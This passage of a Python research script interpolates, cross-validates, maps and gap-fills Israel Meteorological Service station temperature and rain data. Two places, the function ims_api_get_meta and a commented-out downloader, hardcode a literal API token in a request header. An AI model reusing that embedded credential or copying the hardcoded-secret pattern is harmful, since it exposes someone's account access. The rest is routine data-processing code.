coarse_dem(da)\n# interpolated, ss = model.execute('grid', r, c, awd['data'].values)\n# elif method == 'rkrig':\n# # est = LinearRegression()\n# est = RandomForestRegressor()\n# model = RegressionKriging(regression_model=est, n_closest_points=5,\n# verbose=True)\n# p = np.array(alts).reshape(-1, 1)\n# model.fit(p, X, y)\n# P = awd.flatten().reshape(-1, 1)\n# interpolated = model.predict(P, rr_cc_as_cols).reshape(da.values.shape)\n# try:\n# u = check_estimator(model)\n# except TypeError:\n# u = False\n# pass\n if cv is not None and not gridsearch: # and u is None):\n # from sklearn.model_selection import cross_validate\n from sklearn import metrics\n cv = parse_cv(cv)\n ytests = []\n ypreds = []\n for train_idx, test_idx in cv.split(X):\n X_train, X_test = X[train_idx], X[test_idx] # requires arrays\n y_train, y_test = y[train_idx], y[test_idx]\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n # there is only one y-test and y-pred per iteration over the loo.split,\n # so to get a proper graph, we append them to respective lists.\n ytests += list(y_test)\n ypreds += list(y_pred)\n true_vals = np.array(ytests)\n predicted = np.array(ypreds)\n r2 = metrics.r2_score(ytests, ypreds)\n ms_error = metrics.mean_squared_error(ytests, ypreds)\n print(\"R^2: {:.5f}%, MSE: {:.5f}\".format(r2*100, ms_error))\n if gridsearch:\n cv = parse_cv(cv)\n param_dict = {\"method\": [\"ordinary\", \"universal\"],\n \"variogram_model\": [\"linear\", \"power\", \"gaussian\",\n \"spherical\"],\n # \"nlags\": [4, 6, 8],\n # \"weight\": [True, False]\n }\n estimator = GridSearchCV(Krige(), param_dict, verbose=True, cv=cv,\n scoring='neg_mean_absolute_error',\n return_train_score=True, n_jobs=1)\n estimator.fit(X, y)\n if hasattr(estimator, 'best_score_'):\n print('best_score = 
{:.3f}'.format(estimator.best_score_))\n print('best_params = ', estimator.best_params_)\n \n return estimator\n# if (cv is not None and not u):\n# from sklearn import metrics\n# cv = parse_cv(cv)\n# ytests = []\n# ypreds = []\n# for train_idx, test_idx in cv.split(X):\n# X_train, X_test = X[train_idx], X[test_idx] # requires arrays\n# y_train, y_test = y[train_idx], y[test_idx]\n## model = UniversalKriging(X_train[:, 0], X_train[:, 1], y_train,\n## variogram_model='linear', verbose=False,\n## enable_plotting=False)\n# model.X_ORIG = X_train[:, 0]\n# model.X_ADJUSTED = model.X_ORIG\n# model.Y_ORIG = X_train[:, 1]\n# model.Y_ADJUSTED = model.Y_ORIG\n# model.Z = y_train\n# y_pred, ss = model.execute('points', X_test[0, 0],\n# X_test[0, 1])\n# # there is only one y-test and y-pred per iteration over the loo.split,\n# # so to get a proper graph, we append them to respective lists.\n# ytests += list(y_test)\n# ypreds += list(y_pred)\n# true_vals = np.array(ytests)\n# predicted = np.array(ypreds)\n# r2 = metrics.r2_score(ytests, ypreds)\n# ms_error = metrics.mean_squared_error(ytests, ypreds)\n# print(\"R^2: {:.5f}%, MSE: {:.5f}\".format(r2*100, ms_error))\n# cv_results = cross_validate(gp, X, y, cv=cv, scoring='mean_squared_error',\n# return_train_score=True, n_jobs=-1)\n# test = xr.DataArray(cv_results['test_score'], dims=['kfold'])\n# train = xr.DataArray(cv_results['train_score'], dims=['kfold'])\n# train.name = 'train'\n# cds = test.to_dataset(name='test')\n# cds['train'] = train\n# cds['kfold'] = np.arange(len(cv_results['test_score'])) + 1\n# cds['mean_train'] = cds.train.mean('kfold')\n# cds['mean_test'] = cds.test.mean('kfold')\n\n # interpolated=griddata(X, y, (rr, cc), method='nearest')\n model.fit(X, y)\n interpolated = model.predict(rr_cc_as_cols).reshape(da.values.shape)\n da_inter = da.copy(data=interpolated)\n if lapse_rate is not None and var == 'TD':\n da_inter -= lapse_rate * awd / 1000.0\n if (rms is not None and cv is None): # or (rms is not None and not u):\n predicted = []\n true_vals = []\n for i, row in geo_snap.iterrows():\n lat = da.sel(lat=row['lat'], method='nearest').lat.values\n lon = da.sel(lon=row['lon'], method='nearest').lon.values\n pred = da_inter.loc[{'lat': lat, 'lon': lon}].values.item()\n true = row[var]\n predicted.append(pred)\n true_vals.append(true)\n predicted = np.array(predicted)\n true_vals = np.array(true_vals)\n ms_error = mean_squared_error(true_vals, predicted)\n print(\"MSE: {:.5f}\".format(ms_error))\n if plot:\n import salem\n from salem import DataLevels, Map\n import cartopy.crs as ccrs\n # import cartopy.io.shapereader as shpreader\n import matplotlib.pyplot as plt\n # fname = gis_path / 'ne_10m_admin_0_sovereignty.shp'\n # fname = gis_path / 'gadm36_ISR_0.shp'\n # ax = plt.axes(projection=ccrs.PlateCarree())\n f, ax = plt.subplots(figsize=(6, 10))\n # shdf = salem.read_shapefile(salem.get_demo_file('world_borders.shp'))\n shdf = salem.read_shapefile(gis_path / 'Israel_and_Yosh.shp')\n # shdf = shdf.loc[shdf['CNTRY_NAME'] == 'Israel'] # remove other countries\n shdf.crs = {'init': 'epsg:4326'}\n dsr = da_inter.salem.roi(shape=shdf)\n grid = da_inter.salem.grid\n sm = Map(grid)\n # sm.set_shapefile(gis_path / 'Israel_and_Yosh.shp')\n # sm = dsr.salem.quick_map(ax=ax)\n# sm2 = salem.Map(grid, factor=1)\n# 
sm2.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',\n# edgecolor='k')\n sm.set_data(dsr)\n # sm.set_nlevels(7)\n # sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),\n # cbar_title='degC')\n sm.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',\n edgecolor='k') # , facecolor='aqua')\n # sm.set_topography(awd.values, crs=awd.crs)\n # sm.set_rgb(crs=shdf.crs, natural_earth='hr') # ad\n # lakes = salem.read_shapefile(gis_path/'gis_osm_water_a_free_1.shp')\n sm.set_cmap(cm='rainbow')\n sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),\n cbar_title='degC')\n dl = DataLevels(geo_snap[var], levels=sm.levels)\n dl.set_cmap(sm.cmap)\n x, y = sm.grid.transform(geo_snap.lon.values, geo_snap.lat.values)\n ax.scatter(x, y, color=dl.to_rgb(), s=20, edgecolors='k', linewidths=0.5)\n suptitle = time.replace('T', ' ')\n f.suptitle(suptitle, fontsize=14, fontweight='bold')\n if (rms is not None or cv is not None) and (not gridsearch):\n import seaborn as sns\n f, ax = plt.subplots(1, 2, figsize=(12, 6))\n sns.scatterplot(x=true_vals, y=predicted, ax=ax[0], marker='.',\n s=100)\n resid = predicted - true_vals\n sns.distplot(resid, bins=5, color='c', label='residuals',\n ax=ax[1])\n rmean = np.mean(resid)\n rstd = np.std(resid)\n rmedian = np.median(resid)\n rmse = np.sqrt(mean_squared_error(true_vals, predicted))\n plt.axvline(rmean, color='r', linestyle='dashed', linewidth=1)\n _, max_ = plt.ylim()\n plt.text(rmean + rmean / 10, max_ - max_ / 10,\n 'Mean: {:.2f}, RMSE: {:.2f}'.format(rmean, rmse))\n f.tight_layout()\n # lakes.plot(ax=ax, color='b', edgecolor='k')\n # lake_borders = gpd.overlay(countries, capitals, how='difference')\n # adm1_shapes = list(shpreader.Reader(fname).geometries())\n # ax = plt.axes(projection=ccrs.PlateCarree())\n # ax.coastlines(resolution='10m')\n # ax.add_geometries(adm1_shapes, ccrs.PlateCarree(),\n # edgecolor='black', facecolor='gray', alpha=0.5)\n # da_inter.plot.pcolormesh('lon', 'lat', ax=ax)\n #geo_snap.plot(ax=ax, column=var, cmap='viridis', edgecolor='black',\n # legend=False)\n return da_inter\n\n\ndef create_lat_lon_mesh(lats=[29.5, 33.5], lons=[34, 36],\n points_per_degree=1000):\n import xarray as xr\n import numpy as np\n lat = np.arange(lats[0], lats[1], 1.0 / points_per_degree)\n lon = np.arange(lons[0], lons[1], 1.0 / points_per_degree)\n nans = np.nan * np.ones((len(lat), len(lon)))\n da = xr.DataArray(nans, dims=['lat', 'lon'])\n da['lat'] = lat\n da['lon'] = lon\n return da\n\n\ndef read_save_ims_10mins(path=ims_10mins_path, var='TD'):\n import xarray as xr\n search_str = '*' + var + '_10mins.nc'\n da_list = []\n for file_and_path in path.glob(search_str):\n da = xr.open_dataarray(file_and_path)\n print('reading ims 10mins {} data for {} station'.format(var, da.name))\n da_list.append(da)\n print('merging...')\n ds = xr.merge(da_list)\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n filename = 'ims_' + var + '_10mins.nc'\n print('saving...')\n ds.to_netcdf(path / filename, 'w', encoding=encoding)\n print('{} was saved to {}.'.format(filename, path))\n return ds\n\n\ndef analyse_10mins_ims_field(path=ims_10mins_path, var='TD',\n gis_path=gis_path, dem_path=work_yuval/'AW3D30'):\n import xarray as xr\n import collections\n import numpy as np\n # TODO: make 2d histogram of stations by altitude and time...\n awd = xr.open_rasterio(dem_path / 'israel_dem.tif')\n awd = awd.squeeze(drop=True)\n filename = 'ims_' + var + 
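`create_lat_lon_mesh` just allocates an all-NaN grid for the interpolators to fill; the resolution arithmetic is worth a quick check:

```python
da = create_lat_lon_mesh(lats=[29.5, 33.5], lons=[34, 36], points_per_degree=250)
print(da.shape)                  # (1000, 500): 4 deg of latitude x 250, 2 deg of longitude x 250
print(da.isnull().all().item())  # True -- every cell starts as NaN
```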
'_10mins.nc'\n ds = xr.open_dataset(path / filename)\n meta = read_ims_metadata_from_files(path=gis_path,\n filename='IMS_10mins_meta_data.xlsx')\n meta.index = meta.ID.astype('int')\n meta.drop('ID', axis=1, inplace=True)\n meta.sort_index(inplace=True)\n # there are some stations with the same altitude, i'm mapping them:\n duplicate_alts = [item for item, count in collections.Counter(\n meta['alt']).items() if count > 1]\n print(duplicate_alts)\n # then replacing them with a 1-meter seperations:\n for dup in duplicate_alts:\n dup_size = len(meta.loc[meta['alt'] == dup, 'alt'])\n start_value = meta.loc[meta['alt'] == dup, 'alt'].values[0]\n replace_values = np.arange(start_value, start_value + dup_size)\n print(\n 'duplicate {} has {} values, replacing with {}'.format(\n dup,\n dup_size,\n replace_values))\n meta.loc[meta['alt'] == dup, 'alt'] = replace_values\n for da in ds.data_vars.keys():\n id_ = ds[da].attrs['station_id']\n try:\n lat = meta.loc[id_, 'lat']\n lon = meta.loc[id_, 'lon']\n alt = meta.loc[id_, 'alt']\n except KeyError:\n lat = ds[da].attrs['station_lat']\n lon = ds[da].attrs['station_lon']\n print('station {} keyerror.'.format(da))\n alt = 'None'\n try:\n alt = awd.sel(x=float(lon), y=float(lat), method='nearest').values.item()\n except ValueError:\n print('station {} has not known lat or lon...'.format(ds[da].attrs['station_name']))\n ds[da].attrs['station_lat'] = lat\n ds[da].attrs['station_lon'] = lon\n ds[da].attrs['station_alt'] = alt\n return ds\n\n\ndef geo_pandas_time_snapshot(path=ims_path, var='TD', freq='10mins',\n datetime='2013-10-19T10:00:00',\n gis_path=gis_path, plot=True):\n import xarray as xr\n import pandas as pd\n import geopandas as gpd\n import matplotlib.pyplot as plt\n from aux_gps import path_glob\n # TODO: add simple df support\n # first, read ims_10mins data for choice var:\n # file should be : 'IMS_TD_israeli_10mins_filled.nc'\n glob_str = 'IMS_{}_israeli_{}*.nc'.format(var, freq)\n file = path_glob(path, glob_str=glob_str)[0]\n ds = xr.open_dataset(file)\n ds = ds.sel(time=datetime)\n# meta = read_ims_metadata_from_files(path=gis_path, option='10mins')\n# meta.index = meta.ID.astype('int')\n# meta.drop('ID', axis=1, inplace=True)\n# meta.sort_index(inplace=True)\n cols_list = []\n for dvar in ds.data_vars.values():\n value = dvar.values.item()\n id_ = dvar.attrs['station_id']\n lat = dvar.attrs['station_lat']\n lon = dvar.attrs['station_lon']\n alt = dvar.attrs['station_alt']\n name = dvar.name\n var_ = dvar.attrs['channel_name']\n cols = [pd.to_datetime(datetime), name, id_, lat, lon, alt,\n var_, value]\n cols_list.append(cols)\n df = pd.DataFrame(cols_list)\n df.columns = ['time', 'name', 'id', 'lat', 'lon', 'alt', 'var_name', var_]\n df.dropna(inplace=True)\n df = df.astype({'lat': 'float64', 'lon': 'float64'})\n # geopandas part:\n isr = gpd.read_file(gis_path / 'Israel_demog_yosh.shp')\n isr.crs = {'init': 'epsg:4326'}\n geo_snap = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.lon,\n df.lat),\n crs=isr.crs)\n if plot:\n ax = isr.plot()\n geo_snap.plot(ax=ax, column=var_, cmap='viridis', edgecolor='black',\n legend=True)\n plt.title(var_ + ' in ' + datetime)\n return geo_snap\n\n\ndef get_meta_data_hourly_ims_climate_database(ds):\n import pandas as pd\n name_list = []\n for name, da in ds.data_vars.items():\n data = [name.split('_')[0], da.attrs['station_id'], da.attrs['lat'],\n da.attrs['lon'], da.attrs['height']]\n name_list.append(data)\n df = pd.DataFrame(name_list)\n df.columns = ['name', 'id', 'lat', 'lon', 'height']\n 
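The duplicate-altitude repair above matters because `alt` later serves as an index; stations sharing an altitude get spread 1 m apart. In miniature:

```python
import collections
import numpy as np

alts = [62.0, 150.0, 62.0, 62.0]
dups = [v for v, c in collections.Counter(alts).items() if c > 1]  # [62.0]
# three stations at 62 m become 62, 63 and 64 m, exactly as in the loop above
replacement = np.arange(62.0, 62.0 + 3)  # array([62., 63., 64.])
```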
return df\n\n\ndef proccess_hourly_ims_climate_database(path=ims_path, var='tas',\n times=('1996', '2019')):\n import xarray as xr\n import numpy as np\n ds = xr.open_dataset(path / 'hourly_ims.nc')\n if var is not None:\n ds = ds.sel({'var': var})\n print('selecting {} variables'.format(var))\n if times is not None:\n print('selecting times from {} to {}'.format(times[0], times[1]))\n ds = ds.sel(time=slice(times[0], times[1]))\n to_drop_list = []\n for name, da in ds.data_vars.items():\n if (np.isnan(da) == True).all().item():\n to_drop_list.append(name)\n ds = ds.drop(to_drop_list)\n return ds\n\n\ndef read_hourly_ims_climate_database(path=ims_path / 'ground',\n savepath=None):\n \"\"\"downloaded from tau...ds is a dataset of all stations,\n times is a time period\"\"\"\n import pandas as pd\n import xarray as xr\n from aux_gps import print_saved_file\n da_list = []\n for file in sorted(path.glob('*.csv')):\n name = file.as_posix().split('/')[-1].split('_')[0]\n sid = file.as_posix().split('/')[-1].split('_')[1]\n array_name = '_'.join([name, sid])\n print('reading {} station...'.format(array_name))\n df = pd.read_csv(file, index_col='time')\n df.index = pd.to_datetime(df.index)\n df.drop(labels=['Unnamed: 0', 'name'], axis=1, inplace=True)\n lat = df.loc[:, 'lat'][0]\n lon = df.loc[:, 'lon'][0]\n height = df.loc[:, 'height'][0]\n df.drop(labels=['lat', 'lon', 'height'], axis=1, inplace=True)\n da = df.to_xarray().to_array(dim='var')\n da.name = array_name\n da.attrs['station_id'] = sid\n da.attrs['lat'] = lat\n da.attrs['lon'] = lon\n da.attrs['height'] = height\n da_list.append(da)\n ds = xr.merge(da_list)\n print('Done!')\n if savepath is not None:\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n ds.to_netcdf(savepath / 'hourly_ims.nc', 'w', encoding=encoding)\n print_saved_file('hourly_ims.nc', savepath)\n return ds\n\n\ndef read_ims_metadata_from_files(path=gis_path, freq='10mins'):\n # for longer climate archive data use filename = IMS_climate_archive_meta_data.xls\n import pandas as pd\n \"\"\"parse ims stations meta-data\"\"\"\n if freq == '10mins':\n filename = 'IMS_10mins_meta_data.xlsx'\n ims = pd.read_excel(path / filename,\n sheet_name='מטה-דטה', skiprows=1)\n # drop two last cols and two last rows:\n ims = ims.drop(ims.columns[[-1, -2]], axis=1)\n ims = ims.drop(ims.tail(2).index)\n cols = ['#', 'ID', 'name_hebrew', 'name_english', 'east', 'west',\n 'lon', 'lat', 'alt', 'starting_date', 'variables', 'model',\n 'eq_position', 'wind_meter_height', 'notes']\n ims.columns = cols\n ims.index = ims['#'].astype(int)\n ims = ims.drop('#', axis=1)\n # fix lat, lon cols:\n ims['lat'] = ims['lat'].str.replace(u'\\xba', '').astype(float)\n ims['lon'] = ims['lon'].str.replace(u'\\xba', '').astype(float)\n # fix alt col:\n ims['alt'] = ims['alt'].replace('~', '', regex=True).astype(float)\n # fix starting date col:\n ims['starting_date'] = pd.to_datetime(ims['starting_date'])\n elif freq == 'hourly':\n filename = 'IMS_climate_archive_meta_data.xls'\n ims = pd.read_excel(path / filename,\n sheet_name='תחנות אקלים', skiprows=1)\n cols = ['ID', 'name_hebrew', 'name_english', 'station_type', 'east',\n 'west', 'lon', 'lat', 'alt', 'starting_date', 'closing_date',\n 'date_range']\n ims.columns = cols\n # ims.index = ims['ID'].astype(int)\n # ims = ims.drop('ID', axis=1)\n # fix lat, lon cols:\n ims['lat'] = ims['lat'].str.replace(u'\\xba', '').astype(float)\n ims['lon'] = ims['lon'].str.replace(u'\\xba', '').astype(float)\n # fix alt 
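The all-NaN screen in `proccess_hourly_ims_climate_database` can lean on xarray's own predicate (`drop_vars` is the current spelling of the deprecated `drop` used above); an equivalent sketch:

```python
import numpy as np
import xarray as xr

ds = xr.Dataset({'a': ('time', [np.nan, np.nan]), 'b': ('time', [1.0, np.nan])})
to_drop = [name for name, da in ds.data_vars.items() if da.isnull().all().item()]
ds = ds.drop_vars(to_drop)  # only 'b' survives
```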
col:\n ims['alt'] = ims['alt'].replace('~', '', regex=True).astype(float)\n # fix starting date, closing_date col:\n ims['starting_date'] = pd.to_datetime(ims['starting_date'])\n ims['closing_date'] = pd.to_datetime(ims['closing_date'])\n return ims\n\n\ndef produce_geo_ims(path, freq='10mins',\n closed_stations=False, plot=True):\n import geopandas as gpd\n import numpy as np\n isr = gpd.read_file(path / 'Israel_and_Yosh.shp')\n isr.crs = {'init': 'epsg:4326'}\n ims = read_ims_metadata_from_files(path=path, freq=freq)\n if closed_stations:\n ims = ims[np.isnat(ims.closing_date)]\n geo_ims = gpd.GeoDataFrame(ims, geometry=gpd.points_from_xy(ims.lon,\n ims.lat),\n crs=isr.crs)\n if plot:\n ax = isr.plot()\n geo_ims.plot(ax=ax, column='alt', cmap='Reds', edgecolor='black',\n legend=True)\n return geo_ims\n\n\ndef ims_api_get_meta(active_only=True, channel_name='TD'):\n import requests\n import pandas as pd\n \"\"\"get meta data on 10mins ims stations\"\"\"\n myToken = 'f058958a-d8bd-47cc-95d7-7ecf98610e47'\n headers = {'Authorization': 'ApiToken ' + myToken}\n r = requests.get('https://api.ims.gov.il/v1/envista/stations/',\n headers=headers)\n stations_10mins = pd.DataFrame(r.json())\n # filter inactive stations:\n if active_only:\n stations_10mins = stations_10mins[stations_10mins.active]\n # arrange lat lon nicely and add channel num for dry temp:\n lat_ = []\n lon_ = []\n channelId_list = []\n for index, row in stations_10mins.iterrows():\n lat_.append(row['location']['latitude'])\n lon_.append(row['location']['longitude'])\n channel = [x['channelId'] for x in row.monitors if x['name'] ==\n channel_name]\n if channel:\n channelId_list.append(channel[0])\n else:\n channelId_list.append(None)\n stations_10mins['lat'] = lat_\n stations_10mins['lon'] = lon_\n stations_10mins[channel_name + '_channel'] = channelId_list\n stations_10mins.drop(['location', 'StationTarget', 'stationsTag'],\n axis=1, inplace=True)\n return stations_10mins\n\n\n#def download_ims_data(geo_df, path, end_date='2019-04-15'):\n# import requests\n# import glob\n# import pandas as pd\n#\n# def to_dataarray(df, index, row):\n# import pandas as pd\n# ds = df.to_xarray()\n# ds['time'] = pd.to_datetime(ds.time)\n# channel_name = ds.name.isel(time=0).values\n# channel_id = ds.id.isel(time=0).values\n# ds = ds.drop(['id', 'name'])\n# da = ds.to_array(dim='TD', name=str(index))\n# da.attrs['channel_id'] = channel_id.item()\n# da.attrs['channel_name'] = channel_name.item()\n# da.attrs['station_name'] = row.name_english\n# da.attrs['station_id'] = row.ID\n# da.attrs['station_lat'] = row.lat\n# da.attrs['station_lon'] = row.lon\n# da.attrs['station_alt'] = row.alt\n# return da\n#\n# def get_dates_list(starting_date, end_date):\n# \"\"\"divide the date span into full 1 years and a remainder, tolist\"\"\"\n# import numpy as np\n# import pandas as pd\n# end_date = pd.to_datetime(end_date)\n# s_year = starting_date.year\n# e_year = end_date.year\n# years = np.arange(s_year, e_year + 1)\n# dates = [starting_date.replace(year=x) for x in years]\n# if (end_date - dates[-1]).days > 0:\n# dates.append(end_date)\n# return dates\n#\n# myToken = 'f058958a-d8bd-47cc-95d7-7ecf98610e47'\n# headers = {'Authorization': 'ApiToken ' + myToken}\n# already_dl = []\n# for paths in glob.glob(path+'*_TD.nc'):\n# already_dl.append(paths.split('/')[-1].split('.')[0].split('_')[0])\n# to_download = list(set(geo_df.index.values.tolist()\n# ).difference(set(already_dl)))\n# if to_download:\n# geo_df = geo_df.loc[to_download]\n# for index, row in 
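A usage sketch for the API helper above; it needs a valid IMS token at runtime, and only the three columns added by the function itself (`lat`, `lon`, and `<channel>_channel`) are guaranteed to exist, since the rest depend on the API payload:

```python
meta = ims_api_get_meta(active_only=True, channel_name='TD')
# one row per active station, with flattened coordinates and the TD channel id
print(meta[['lat', 'lon', 'TD_channel']].head())
```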
geo_df.iterrows():\n# # get a list of dates to download: (1 year old parts)\n# dates = get_dates_list(row.starting_date, end_date)\n# # get station id and channel id(only dry temperature):\n# name = row.name_english\n# station_id = row.ID\n# channel_id = row.channel_id\n# # if tempertue is not measuered in station , skip:\n# if channel_id == 0:\n# continue\n# print(\n# 'Getting IMS data for {} station(ID={}) from channel {}'.format(\n# name,\n# station_id,\n# channel_id))\n# # loop over one year time span and download:\n# df_list = []\n# for i in range(len(dates) - 1):\n# first_date = dates[i].strftime('%Y/%m/%d')\n# last_date = dates[i + 1].strftime('%Y/%m/%d')\n# print('proccesing dates: {} to {}'.format(first_date, last_date))\n# dl_command = ('https://api.ims.gov.il/v1/envista/stations/' +\n# str(station_id) + '/data/' + str(channel_id) +\n# '?from=' + first_date + '&to=' + last_date)\n# r = requests.get(dl_command, headers=headers)\n# if r.status_code == 204: # i.e., no content:\n# print('no content for this search, skipping...')\n# break\n# print('parsing to dataframe...')\n# df_list.append(parse_ims_to_df(r.json()['data']))\n# print('concatanating df and transforming to xarray...')\n# df_all = pd.concat(df_list)\n# # only valid results:\n# # df_valid = df_all[df_all['valid']]\n# df_all.index.name = 'time'\n# da = to_dataarray(df_all, index, row)\n# filename = index + '_TD.nc'\n# comp = dict(zlib=True, complevel=9) # best compression\n# encoding = {var: comp for var in da.to_dataset().data_vars}\n# print('saving to {} to {}'.format(filename, path))\n# da.to_netcdf(path + filename, 'w', encoding=encoding)\n# print('done!')\n# # return df_list\n# # pick station and time span\n# # download\n# # call parse_ims_to_df\n# # concatanate and save to nc\n# return\n\n\ndef fill_fix_all_10mins_IMS_stations(path=ims_10mins_path,\n savepath=ims_path,\n unique_index=True, field='TD',\n clim='dayofyear', fix_only=False):\n \"\"\"loop over all TD 10mins stations and first fix their lat/lon/alt from\n metadata file and then fill them with clim, then save them\n use specific station names to slice irrelevant data\"\"\"\n import xarray as xr\n from aux_gps import path_glob\n # TODO: redo this analysis with adding the hourly TD data\n meta = read_ims_metadata_from_files(freq='10mins')\n files = path_glob(path, '*{}_10mins.nc'.format(field))\n cnt = 1\n da_list = []\n for file_and_path in files:\n da = xr.open_dataarray(file_and_path)\n print('post-proccessing {} data for {} station, ({}/{})'.format(field,\n da.name, cnt, len(files)))\n sid = da.attrs['station_id']\n row = meta[meta.ID == sid]\n if da.name == 'ARIEL':\n da = da.loc['2000-09-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'TEL-YOSEF-20141223':\n da = da.loc['2007-10-01':]\n row = meta[meta.ID == 380]\n print('{} station is sliced and fixed!'.format(da.name))\n elif da.name == 'PARAN-20060124':\n da = da.loc['1995-04-01':]\n row = meta[meta.ID == 207]\n print('{} station is fixed!'.format(da.name))\n elif da.name == 'MIZPE-RAMON-20120927':\n row = meta[meta.ID == 379]\n print('{} station is fixed!'.format(da.name))\n elif da.name == 'SHANI':\n da = da.loc['1995-12-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'BET-ZAYDA':\n da = da.loc['1995-12-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'BEER-SHEVA-UNI':\n print('skipping {} station...'.format(da.name))\n continue\n no_row_in_meta = row.empty\n assert not no_row_in_meta\n if field == 'Rain':\n if da.name == 
'YOTVATA':\n da = da.loc['2009-09-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ELAT':\n da = da.loc['2002-11-25':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ELON':\n da = da.loc['1999-02-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'QEVUZAT-YAVNE':\n da = da.loc['2000-02-05':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ZOMET-HANEGEV':\n da = da.loc['2005-11-21':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'JERUSALEM-CENTRE':\n da = da.loc['1995-11-13':]\n print('{} station is sliced!'.format(da.name)) \n elif da.name == 'NETIV-HALAMED-HE':\n da = da.loc['1995-10-15':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'GAT':\n da = da.loc['2007-10-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'AVNE-ETAN':\n da = da.loc['1993-07-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'ROSH-HANIQRA':\n da = da.loc['2007-09-01':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'TAVOR-KADOORIE':\n da = da.loc['1995-01-15':]\n print('{} station is sliced!'.format(da.name))\n elif da.name == 'EN-KARMEL':\n da = da.loc['1993-12-01':]\n print('{} station is sliced!'.format(da.name))\n # if no_row_in_meta:\n # print('{} not exist in meta'.format(da.name))\n da.attrs['station_lat'] = row.lat.values.item()\n da.attrs['station_lon'] = row.lon.values.item()\n da.attrs['station_alt'] = row.alt.values.item()\n if field == 'TD' and not fix_only:\n fill_missing_single_ims_station(da, unique_index=unique_index,\n clim_period=clim, savepath=path,\n verbose=False)\n elif field == 'TD' and fix_only:\n da_list.append(da)\n else:\n da_list.append(da)\n cnt += 1\n if field == 'TD' and not fix_only:\n print('Done filling all stations!')\n files = path_glob(path, '*TD_10mins_filled.nc')\n dsl = [xr.open_dataarray(file) for file in files]\n elif field == 'TD' and fix_only:\n dsl = da_list\n else:\n dsl = da_list\n print('merging all files...')\n ds = xr.merge(dsl)\n if savepath is not None:\n if field == 'TD' and not fix_only:\n filename = 'IMS_TD_israeli_10mins_filled.nc'\n elif field == 'TD' and fix_only:\n filename = 'IMS_{}_israeli_10mins.nc'.format(field)\n else:\n filename = 'IMS_{}_israeli_10mins.nc'.format(field)\n print('saving {} to {}'.format(filename, savepath))\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n ds.to_netcdf(savepath / filename, 'w', encoding=encoding)\n print('Done!')\n return ds\n\n\n#def produce_T_dataset(path=ims_10mins_path, savepath=None, unique_index=True,\n# clim_period='dayofyear'):\n# import xarray as xr\n# from aux_gps import path_glob\n# da_list = []\n# for file_and_path in path_glob(path, '*TD_10mins.nc'):\n# da = xr.open_dataarray(file_and_path)\n# print('post-proccessing temperature data for {} station'.format(da.name))\n# da_list.append(fill_missing_single_ims_station(da, unique_index,\n# clim_period))\n# ds = xr.merge(da_list)\n# if savepath is not None:\n# filename = 'IMS_TD_israeli_10mins_filled.nc'\n# print('saving {} to {}'.format(filename, savepath))\n# comp = dict(zlib=True, complevel=9) # best compression\n# encoding = {var: comp for var in ds.data_vars}\n# ds.to_netcdf(savepath / filename, 'w', encoding=encoding)\n# print('Done!')\n# return ds\n\n\ndef fill_missing_single_ims_station(da, unique_index=True,\n clim_period='dayofyear', savepath=None,\n verbose=True):\n \"\"\"fill in the missing time 
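The per-station `if/elif` ladders above are really data; a table-driven equivalent keeps the cut dates in one place (dates copied from the rain branches above, dict name hypothetical):

```python
RAIN_SLICE_START = {
    'YOTVATA': '2009-09-01', 'ELAT': '2002-11-25', 'ELON': '1999-02-01',
    'QEVUZAT-YAVNE': '2000-02-05', 'ZOMET-HANEGEV': '2005-11-21',
    'JERUSALEM-CENTRE': '1995-11-13', 'NETIV-HALAMED-HE': '1995-10-15',
    'GAT': '2007-10-01', 'AVNE-ETAN': '1993-07-01', 'ROSH-HANIQRA': '2007-09-01',
    'TAVOR-KADOORIE': '1995-01-15', 'EN-KARMEL': '1993-12-01',
}
start = RAIN_SLICE_START.get(da.name)
if start is not None:
    da = da.loc[start:]
    print('{} station is sliced!'.format(da.name))
```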
data for the ims station of any variable with\n clim_period is the fine tuning of the data replaced, options are:\n month, weekofyear, dayofyear. return a dataset with original and filled\n dataarray\"\"\"\n # da should be dattaarray and not dataset!\n import pandas as pd\n import numpy as np\n import xarray as xr\n from aux_gps import get_unique_index\n print('filling in missing data for {}'.format(da.name))\n if unique_index:\n ind_diff = da.size - get_unique_index(da).size\n da = get_unique_index(da)\n if verbose:\n print('dropped {} non-unique datetime index.'.format(ind_diff))\n # make sure no coords are in xarray:\n da = da.reset_coords(drop=True)\n # make sure nans are dropped:\n nans_diff = da.size - da.dropna('time').size\n if verbose:\n print('dropped {} nans.'.format(nans_diff))\n da_no_nans = da.dropna('time')\n if clim_period == 'month':\n grpby = 'time.month'\n if verbose:\n print('long term monthly mean data replacment selected')\n elif clim_period == 'weekofyear':\n if verbose:\n print('long term weekly mean data replacment selected')\n grpby = 'time.weekofyear'\n elif clim_period == 'dayofyear':\n if verbose:\n print('long term daily mean data replacment selected')\n grpby = 'time.dayofyear'\n # first compute the climatology and the anomalies:\n if verbose:\n print('computing anomalies:')\n climatology = da_no_nans.groupby(grpby).mean('time')\n anom = da_no_nans.groupby(grpby) - climatology\n # then comupte the diurnal cycle:\n if verbose:\n print('computing diurnal change:')\n diurnal = anom.groupby('time.hour').mean('time')\n # assemble old and new time and comupte the difference:\n if verbose:\n print('assembeling missing data:')\n old_time = pd.to_datetime(da_no_nans.time.values)\n freq = pd.infer_freq(da.time.values)\n new_time = 